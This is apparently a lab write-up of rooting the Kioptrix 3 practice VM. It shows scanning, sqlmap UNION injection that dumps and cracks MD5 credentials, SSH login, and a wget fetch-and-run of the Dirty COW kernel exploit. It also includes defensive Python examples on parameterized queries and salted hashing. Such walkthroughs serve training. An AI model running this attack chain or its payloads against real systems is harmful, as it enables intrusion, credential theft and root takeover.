Last night I solved most of the web challenges on ctfs.me. I couldn't sleep any more, but I ranked 3rd. I will write up all of the challenges I have already solved, maybe later. Tonight I am trying the next box, the third of the Kioptrix series. Let's get started.
The target IP is 192.168.1.73.
┌─[root@<attacker>]─[~]
└──> nmap 192.168.1.* -sn -n

Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-07 20:37 +0630
Nmap scan report for 192.168.1.1
Host is up (0.00038s latency).
MAC Address: 60:E3:27:BE:75:78 (Tp-link Technologies)
Nmap scan report for 192.168.1.73
Host is up (0.00049s latency).
MAC Address: 00:0C:29:ED:78:4A (VMware)
Nmap scan report for 192.168.1.74
Host is up (0.0045s latency).
MAC Address: CC:AF:78:12:3B:9F (Hon Hai Precision Ind.)
Nmap scan report for 192.168.1.100
Host is up (0.00016s latency).
MAC Address: 34:97:F6:C3:0B:66 (Asustek Computer)
Nmap scan report for 192.168.1.101
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.25 seconds
Scan the target again with an Nmap version scan.
┌─[root@<attacker>]─[~]
└──> nmap -sV 192.168.1.73

Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-07 20:40 +0630
Nmap scan report for kioptrix3.com (192.168.1.73)
Host is up (0.00026s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
MAC Address: 00:0C:29:ED:78:4A (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.29 seconds
Simple: only SSH and HTTP are open. Now scan for directories with dirbuster.
┌─[root@<attacker>]─[~]
└──> dirb http://192.168.1.73 -r

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sun Jan  7 20:41:09 2018
URL_BASE: http://192.168.1.73/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.1.73/ ----
==> DIRECTORY: http://192.168.1.73/cache/
==> DIRECTORY: http://192.168.1.73/core/
+ http://192.168.1.73/data (CODE:403|SIZE:323)
+ http://192.168.1.73/favicon.ico (CODE:200|SIZE:23126)
==> DIRECTORY: http://192.168.1.73/gallery/
+ http://192.168.1.73/index.php (CODE:200|SIZE:1819)
==> DIRECTORY: http://192.168.1.73/modules/
==> DIRECTORY: http://192.168.1.73/phpmyadmin/
+ http://192.168.1.73/server-status (CODE:403|SIZE:332)
==> DIRECTORY: http://192.168.1.73/style/

-----------------
END_TIME: Sun Jan  7 20:41:17 2018
DOWNLOADED: 4612 - FOUND: 4
Open port 80 in the browser first and check whether it is vulnerable. While looking for a parameter to exploit, I got a SQL injection error message when I entered a single quote here:
http://kioptrix3.com/gallery/gallery.php?id=1
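The error that a single quote triggers comes from the page's id value being pasted straight into the SQL text, which is also why a UNION payload can pull rows out of an unrelated table. This is an added illustration, not code from the Kioptrix VM or from Gallarific: the schema, the table contents and the hash placeholders are constructed, and sqlite3 stands in for MySQL. It puts the vulnerable lookup beside the parameterized one so the difference in behaviour is visible on the same inputs.

```python
import sqlite3

# Constructed in-memory stand-in for the gallery database (not the VM's real
# schema): a small galleries table plus the dev_accounts table the write-up
# later dumps. The password values are placeholders, not real hashes.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE gallarific_galleries (id INTEGER, name TEXT);
        INSERT INTO gallarific_galleries VALUES (1, 'Holiday'), (2, 'Pets');
        CREATE TABLE dev_accounts (username TEXT, password TEXT);
        INSERT INTO dev_accounts VALUES ('dreg', 'hash-placeholder-1'),
                                        ('loneferret', 'hash-placeholder-2');
    """)
    return db


def gallery_vulnerable(db, gallery_id):
    # The pattern behind gallery.php?id=: the raw query-string value is
    # concatenated into the SQL, so a stray quote breaks the syntax (the error
    # the write-up saw) and a UNION appends rows from any other table.
    sql = "SELECT id, name FROM gallarific_galleries WHERE id=" + gallery_id
    return db.execute(sql).fetchall()


def gallery_safe(db, gallery_id):
    # Hardened form: validate the type first, then bind the value as a
    # parameter so the database never parses it as SQL.
    if not gallery_id.isdigit():
        raise ValueError("gallery id must be a positive integer")
    sql = "SELECT id, name FROM gallarific_galleries WHERE id=?"
    return db.execute(sql, (int(gallery_id),)).fetchall()


def probe(handler, db, value):
    """Run a handler and report either its rows or the exception it raised."""
    try:
        return ("rows", handler(db, value))
    except (sqlite3.Error, ValueError) as exc:
        return ("error", type(exc).__name__)


if __name__ == "__main__":
    db = make_db()
    inputs = ("1", "1'", "1 UNION ALL SELECT username, password FROM dev_accounts")
    for value in inputs:
        print("vulnerable", repr(value), "->", probe(gallery_vulnerable, db, value))
        print("safe      ", repr(value), "->", probe(gallery_safe, db, value))
```

The vulnerable handler returns an OperationalError for `1'` (the database-level error message that leaked to the page) and hands back the dev_accounts rows for the UNION input; the safe handler rejects both before any SQL runs. The same detection idea applies to the web logs: a 500 on gallery.php with a quote or `UNION` in the query string is the signal sqlmap itself produced in the run below.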
Now open sqlmap to dump all the data from the tables, but first I try the OS shell upload test. It fails because I don't know the web server path.
┌─[root@<attacker>]─[~]
└──> sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --is-dba --os-shell
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.1.12#stable}
|_ -| . [(]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 20:46:03

[20:46:04] [INFO] resuming back-end DBMS 'mysql'
[20:46:04] [INFO] testing connection to the target URL
[20:46:04] [INFO] heuristics detected web page charset 'ISO-8859-2'
[20:46:04] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71717a7a71,0x6c434553716d6558477153586d41675642434165505649536143556f695946784f65706c464d6277,0x71717a7671),NULL,NULL,NULL-- eUyW
---
[20:46:04] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5
[20:46:04] [INFO] testing if current user is DBA
[20:46:04] [INFO] fetching current user
current user is DBA: True
[20:46:04] [INFO] going to use a web backdoor for command prompt
[20:46:04] [INFO] fingerprinting the back-end DBMS operating system
[20:46:04] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
do you want sqlmap to further try to provoke the full path disclosure? [Y/n] y
[20:46:10] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) ('/var/www/, /var/www/html, /usr/local/apache2/htdocs, /var/www/nginx-default, /srv/www') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 1
[20:46:12] [INFO] retrieved web server absolute paths: '/gallery/gallery~.php'
[20:46:12] [INFO] trying to upload the file stager on '/var/www/' via LIMIT 'LINES TERMINATED BY' method
[20:46:12] [WARNING] unable to upload the file stager on '/var/www/'
[20:46:12] [INFO] trying to upload the file stager on '/var/www/' via UNION method
[20:46:12] [WARNING] expect junk characters inside the file as a leftover from UNION query
[20:46:12] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[20:46:12] [INFO] trying to upload the file stager on '/var/www/gallery/gallery.php/' via LIMIT 'LINES TERMINATED BY' method
[20:46:12] [WARNING] unable to upload the file stager on '/var/www/gallery/gallery.php/'
[20:46:12] [INFO] trying to upload the file stager on '/var/www/gallery/gallery.php/' via UNION method
[20:46:12] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[20:46:12] [INFO] trying to upload the file stager on '/var/www/html/' via LIMIT 'LINES TERMINATED BY' method
[20:46:12] [WARNING] unable to upload the file stager on '/var/www/html/'
[20:46:12] [INFO] trying to upload the file stager on '/var/www/html/' via UNION method
[20:46:12] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[20:46:12] [INFO] trying to upload the file stager on '/var/www/html/gallery/gallery.php/' via LIMIT 'LINES TERMINATED BY' method
[20:46:13] [WARNING] unable to upload the file stager on '/var/www/html/gallery/gallery.php/'
[20:46:13] [INFO] trying to upload the file stager on '/var/www/html/gallery/gallery.php/' via UNION method
[20:46:13] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[20:46:13] [INFO] trying to upload the file stager on '/usr/local/apache2/htdocs/' via LIMIT 'LINES TERMINATED BY' method
[20:46:13] [WARNING] unable to upload the file stager on '/usr/local/apache2/htdocs/'
[20:46:13] [INFO] trying to upload the file stager on '/usr/local/apache2/htdocs/' via UNION method
[20:46:13] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[20:46:13] [INFO] trying to upload the file stager on '/usr/local/apache2/htdocs/gallery/gallery.php/' via LIMIT 'LINES TERMINATED BY' method
[20:46:13] [WARNING] unable to upload the file stager on '/usr/local/apache2/htdocs/gallery/gallery.php/'
[20:46:13] [INFO] trying to upload the file stager on '/usr/local/apache2/htdocs/gallery/gallery.php/' via UNION method
[20:46:13] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[20:46:13] [INFO] trying to upload the file stager on '/var/www/nginx-default/' via LIMIT 'LINES TERMINATED BY' method
[20:46:13] [WARNING] unable to upload the file stager on '/var/www/nginx-default/'
[20:46:13] [INFO] trying to upload the file stager on '/var/www/nginx-default/' via UNION method
[20:46:14] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[20:46:14] [INFO] trying to upload the file stager on '/var/www/nginx-default/gallery/gallery.php/' via LIMIT 'LINES TERMINATED BY' method
[20:46:14] [WARNING] unable to upload the file stager on '/var/www/nginx-default/gallery/gallery.php/'
[20:46:14] [INFO] trying to upload the file stager on '/var/www/nginx-default/gallery/gallery.php/' via UNION method
[20:46:14] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[20:46:14] [INFO] trying to upload the file stager on '/srv/www/' via LIMIT 'LINES TERMINATED BY' method
[20:46:14] [WARNING] unable to upload the file stager on '/srv/www/'
[20:46:14] [INFO] trying to upload the file stager on '/srv/www/' via UNION method
[20:46:14] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[20:46:14] [INFO] trying to upload the file stager on '/srv/www/gallery/gallery.php/' via LIMIT 'LINES TERMINATED BY' method
[20:46:14] [WARNING] unable to upload the file stager on '/srv/www/gallery/gallery.php/'
[20:46:14] [INFO] trying to upload the file stager on '/srv/www/gallery/gallery.php/' via UNION method
[20:46:14] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[20:46:14] [INFO] trying to upload the file stager on '/gallery/' via LIMIT 'LINES TERMINATED BY' method
[20:46:14] [WARNING] unable to upload the file stager on '/gallery/'
[20:46:14] [INFO] trying to upload the file stager on '/gallery/' via UNION method
[20:46:15] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[20:46:15] [INFO] trying to upload the file stager on '/gallery/gallery/gallery.php/' via LIMIT 'LINES TERMINATED BY' method
[20:46:15] [WARNING] unable to upload the file stager on '/gallery/gallery/gallery.php/'
[20:46:15] [INFO] trying to upload the file stager on '/gallery/gallery/gallery.php/' via UNION method
[20:46:15] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[20:46:15] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 97 times, 500 (Internal Server Error) - 1 times
[20:46:15] [INFO] fetched data logged to text files under '/root/.sqlmap/output/kioptrix3.com'

[*] shutting down at 20:46:15
Find the database name with sqlmap.
┌─[root@<attacker>]─[~]
└──> sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --current-db
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.1.12#stable}
|_ -| . [)]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 20:47:35

[20:47:35] [INFO] resuming back-end DBMS 'mysql'
[20:47:35] [INFO] testing connection to the target URL
[20:47:35] [INFO] heuristics detected web page charset 'ISO-8859-2'
[20:47:35] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71717a7a71,0x6c434553716d6558477153586d41675642434165505649536143556f695946784f65706c464d6277,0x71717a7671),NULL,NULL,NULL-- eUyW
---
[20:47:35] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5
[20:47:35] [INFO] fetching current database
current database: 'gallery'
[20:47:35] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[20:47:35] [INFO] fetched data logged to text files under '/root/.sqlmap/output/kioptrix3.com'

[*] shutting down at 20:47:35
The database name is gallery. Next, list the tables in this database.
┌─[root@<attacker>]─[~]
└──> sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --tables -D gallery
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.1.12#stable}
|_ -| . [)]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 20:48:37

[20:48:38] [INFO] resuming back-end DBMS 'mysql'
[20:48:38] [INFO] testing connection to the target URL
[20:48:38] [INFO] heuristics detected web page charset 'ISO-8859-2'
[20:48:38] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71717a7a71,0x6c434553716d6558477153586d41675642434165505649536143556f695946784f65706c464d6277,0x71717a7671),NULL,NULL,NULL-- eUyW
---
[20:48:38] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5
[20:48:38] [INFO] fetching tables for database: 'gallery'
[20:48:38] [INFO] the SQL query used returns 7 entries
[20:48:38] [INFO] resumed: dev_accounts
[20:48:38] [INFO] resumed: gallarific_comments
[20:48:38] [INFO] resumed: gallarific_galleries
[20:48:38] [INFO] resumed: gallarific_photos
[20:48:38] [INFO] resumed: gallarific_settings
[20:48:38] [INFO] resumed: gallarific_stats
[20:48:38] [INFO] resumed: gallarific_users
Database: gallery
[7 tables]
+----------------------+
| dev_accounts         |
| gallarific_comments  |
| gallarific_galleries |
| gallarific_photos    |
| gallarific_settings  |
| gallarific_stats     |
| gallarific_users     |
+----------------------+

[20:48:38] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[20:48:38] [INFO] fetched data logged to text files under '/root/.sqlmap/output/kioptrix3.com'

[*] shutting down at 20:48:38
The dev_accounts table is the main table for login info. Now list the columns of this table.
┌─[root@<attacker>]─[~]
└──> sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --columns -T dev_accounts -D gallery
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.1.12#stable}
|_ -| . [(]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 20:49:48

[20:49:49] [INFO] resuming back-end DBMS 'mysql'
[20:49:49] [INFO] testing connection to the target URL
[20:49:49] [INFO] heuristics detected web page charset 'ISO-8859-2'
[20:49:49] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71717a7a71,0x6c434553716d6558477153586d41675642434165505649536143556f695946784f65706c464d6277,0x71717a7671),NULL,NULL,NULL-- eUyW
---
[20:49:49] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5
[20:49:49] [INFO] fetching columns for table 'dev_accounts' in database 'gallery'
[20:49:49] [INFO] the SQL query used returns 3 entries
[20:49:49] [INFO] resumed: "id","int(10)"
[20:49:49] [INFO] resumed: "username","varchar(50)"
[20:49:49] [INFO] resumed: "password","varchar(50)"
Database: gallery
Table: dev_accounts
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(10)     |
| password | varchar(50) |
| username | varchar(50) |
+----------+-------------+

[20:49:49] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[20:49:49] [INFO] fetched data logged to text files under '/root/.sqlmap/output/kioptrix3.com'

[*] shutting down at 20:49:49
Finally, I dump the username and password columns from the dev_accounts table.
┌─[root@<attacker>]─[~]
└──> sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --dump -C username,password -T dev_accounts -D gallery
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.1.12#stable}
|_ -| . [,]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 20:50:52

[20:50:52] [INFO] resuming back-end DBMS 'mysql'
[20:50:52] [INFO] testing connection to the target URL
[20:50:52] [INFO] heuristics detected web page charset 'ISO-8859-2'
[20:50:52] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71717a7a71,0x6c434553716d6558477153586d41675642434165505649536143556f695946784f65706c464d6277,0x71717a7671),NULL,NULL,NULL-- eUyW
---
[20:50:52] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5
[20:50:52] [INFO] fetching entries of column(s) 'password, username' for table 'dev_accounts' in database 'gallery'
[20:50:52] [INFO] the SQL query used returns 2 entries
[20:50:52] [INFO] retrieved: "0d3eccfb887aabd50f243b3f155c0f85","dreg"
[20:50:52] [INFO] retrieved: "5badcaf789d3d1d09794d8f021f40f0e","loneferret"
[20:50:52] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] n
do you want to crack them via a dictionary-based attack? [Y/n/q] n
Database: gallery
Table: dev_accounts
[2 entries]
+------------+----------------------------------+
| username   | password                         |
+------------+----------------------------------+
| dreg       | 0d3eccfb887aabd50f243b3f155c0f85 |
| loneferret | 5badcaf789d3d1d09794d8f021f40f0e |
+------------+----------------------------------+

[20:50:58] [INFO] table 'gallery.dev_accounts' dumped to CSV file '/root/.sqlmap/output/kioptrix3.com/dump/gallery/dev_accounts.csv'
[20:50:58] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[20:50:58] [INFO] fetched data logged to text files under '/root/.sqlmap/output/kioptrix3.com'

[*] shutting down at 20:50:58
The passwords are MD5 hashes. I looked them up at hashkiller.co.uk, which is a really nice site. After cracking the hashes I got the following passwords:
0d3eccfb887aabd50f243b3f155c0f85 MD5 : Mast3r
5badcaf789d3d1d09794d8f021f40f0e MD5 : starwars
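The reason a lookup site can answer instantly is that these are plain, unsalted MD5 digests: one precomputed table of md5(word) serves every user in every database. This is an added example, not code from the page or from Gallarific; the wordlist is a constructed six-entry stand-in for the billions of entries a real lookup service holds. It reproduces the lookup against the two dumped hashes and then shows what the developers should have stored instead: a per-user salt with an iterated PBKDF2-HMAC-SHA256 digest, verified in constant time.

```python
import hashlib
import hmac
import os

# Constructed mini wordlist for the demo; real lookup services hold billions
# of precomputed entries, which is why plain MD5 falls so quickly.
WORDLIST = ["password", "123456", "starwars", "letmein", "Mast3r", "qwerty"]


def md5_hex(word):
    return hashlib.md5(word.encode()).hexdigest()


def lookup_md5(hashes, wordlist=WORDLIST):
    """Reverse unsalted MD5 digests with a precomputed table.

    One table serves every user, because without a salt identical
    passwords always produce identical digests. Unknown digests map to None.
    """
    table = {md5_hex(word): word for word in wordlist}
    return {h: table.get(h.lower()) for h in hashes}


def hash_password(password, iterations=200_000):
    """Salted, iterated PBKDF2-HMAC-SHA256; returns a self-describing string.

    A fresh 16-byte salt per user means two users with the same password get
    different digests, so no shared table can be precomputed.
    """
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password, stored):
    """Recompute with the stored salt and compare in constant time."""
    algo, iterations, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported hash format")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest, bytes.fromhex(digest_hex))


if __name__ == "__main__":
    dumped = ["0d3eccfb887aabd50f243b3f155c0f85", "5badcaf789d3d1d09794d8f021f40f0e"]
    print(lookup_md5(dumped))
    stored = hash_password("starwars")
    print(stored)
    print(verify_password("starwars", stored), verify_password("Starwars", stored))
```

Run it and the two dumped digests resolve to the passwords listed above, while the PBKDF2 string differs on every call for the same password and still verifies. Storage like that would have turned the dump into dead weight for an attacker without a per-hash brute force.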
The final credentials are dreg:Mast3r and loneferret:starwars. I already noticed at the start that SSH was open on the box. Let's try to log in over SSH with these.
┌─[root@<attacker>]─[~]
└──> ssh dreg@192.168.1.73
dreg@192.168.1.73's password:
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
Last login: Sun Jan  7 15:56:07 2018 from 192.168.1.101
dreg@Kioptrix3:~$ ls -al; uname -a; cat /etc/passwd
total 24
drwxr-xr-x 2 dreg dreg 4096 2018-01-07 15:56 .
drwxr-xr-x 5 root root 4096 2011-04-16 07:54 ..
-rw------- 1 dreg dreg  245 2018-01-07 15:56 .bash_history
-rw-r--r-- 1 dreg dreg  220 2011-04-16 07:54 .bash_logout
-rw-r--r-- 1 dreg dreg 2940 2011-04-16 07:54 .bashrc
-rw-r--r-- 1 dreg dreg  586 2011-04-16 07:54 .profile
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
loneferret:x:1000:100:loneferret,,,:/home/loneferret:/bin/bash
dreg:x:1001:1001:Dreg Gevans,0,555-5566,:/home/dreg:/bin/rbash
Login succeeded with the first username, and there are 2 users on the system. The kernel version is 2.6, an old kernel. I am not sure I can get root, but let's try.
Searching Google, I found the Dirty COW exploit to root this kernel.
https://www.exploit-db.com/exploits/40839
dreg@Kioptrix3:~$ wget --no-check-certificate https://www.exploit-db.com/raw/40839 -O dirty.c
--16:01:56--  https://www.exploit-db.com/raw/40839
           => `dirty.c'
Resolving www.exploit-db.com... 192.124.249.8
Connecting to www.exploit-db.com|192.124.249.8|:443... connected.
WARNING: Certificate verification error for www.exploit-db.com: unable to get local issuer certificate
WARNING: certificate common name `*.sucuri.net' doesn't match requested host name `www.exploit-db.com'.
HTTP request sent, awaiting response... 200 OK
Length: 5,006 (4.9K) [text/plain]

100%[============================================================================================>] 5,006         --.--K/s

16:01:57 (303.35 MB/s) - `dirty.c' saved [5006/5006]

dreg@Kioptrix3:~$ gcc -pthread dirty.c -o dirty -lcrypt
dirty.c:193:2: warning: no newline at end of file
dreg@Kioptrix3:~$ ./dirty 133720
-rbash: ./dirty: restricted: cannot specify `/' in command names
It compiled with gcc, but rbash does not allow me to run it. Let me switch to the other user.
dreg@Kioptrix3:~$ su loneferret
Password:
loneferret@Kioptrix3:/home/dreg$ ls -al
total 44
drwxr-xr-x 2 dreg dreg  4096 2018-01-07 16:02 .
drwxr-xr-x 5 root root  4096 2011-04-16 07:54 ..
-rw------- 1 dreg dreg   245 2018-01-07 15:56 .bash_history
-rw-r--r-- 1 dreg dreg   220 2011-04-16 07:54 .bash_logout
-rw-r--r-- 1 dreg dreg  2940 2011-04-16 07:54 .bashrc
-rwxr-xr-x 1 dreg dreg 10939 2018-01-07 16:02 dirty
-rw-r--r-- 1 dreg dreg  5006 2018-01-07 16:01 dirty.c
-rw-r--r-- 1 dreg dreg   586 2011-04-16 07:54 .profile
loneferret@Kioptrix3:/home/dreg$ ./dirty 133720
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: 133720
Complete line:
firefart:fiptwK6toyYJg:0:0:pwned:/root:/bin/bash

mmap: b7fe0000
madvise 0

ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '133720'.


DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '133720'.


DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
loneferret@Kioptrix3:/home/dreg$ su firefart
Password:
firefart@Kioptrix3:/home/dreg#
firefart@Kioptrix3:/home/dreg# id
uid=0(firefart) gid=0(root) groups=0(root)
firefart@Kioptrix3:/home/dreg# mv /tmp/passwd.bak /etc/passwd
firefart@Kioptrix3:/home/dreg# id
uid=0(root) gid=0(root) groups=0(root)
firefart@Kioptrix3:/home/dreg#
Yo! Dirty COW can root it! 😉 Read the flag at /root/Congrats.txt.
root@Kioptrix3:~# cat Congrats.txt
Good for you for getting here.
Regardless of the matter (staying within the spirit of the game of course)
you got here, congratulations are in order. Wasn't that bad now was it.

Went in a different direction with this VM. Exploit based challenges are
nice. Helps workout that information gathering part, but sometimes we
need to get our hands dirty in other things as well.
Again, these VMs are beginner and not intented for everyone.
Difficulty is relative, keep that in mind.
The object is to learn, do some research and have a little (legal) fun in the
process.

I hope you enjoyed this third challenge.

Steven McElrea
aka loneferret
http://www.kioptrix.com

Credit needs to be given to the creators of the gallery webapp and CMS used
for the building of the Kioptrix VM3 site.

Main page CMS:
http://www.lotuscms.org

Gallery application:
Gallarific 2.1 - Free Version released October 10, 2009
http://www.gallarific.com
Vulnerable version of this application can be downloaded
from the Exploit-DB website:
http://www.exploit-db.com/exploits/15891/

The HT Editor can be found here:
http://hte.sourceforge.net/downloads.html
And the vulnerable version on Exploit-DB here:
http://www.exploit-db.com/exploits/17083/

Also, all pictures were taken from Google Images, so being part of the public
domain I used them.
root@Kioptrix3:~#
Bingo! We have done the third box! But there is another method to get root. I checked the sudoers file, and user loneferret can run the ht editor as root:
loneferret ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht
Let's try the other way.
root@Kioptrix3:/# su loneferret
loneferret@Kioptrix3:/$ clear
'xterm-256color': unknown terminal type.
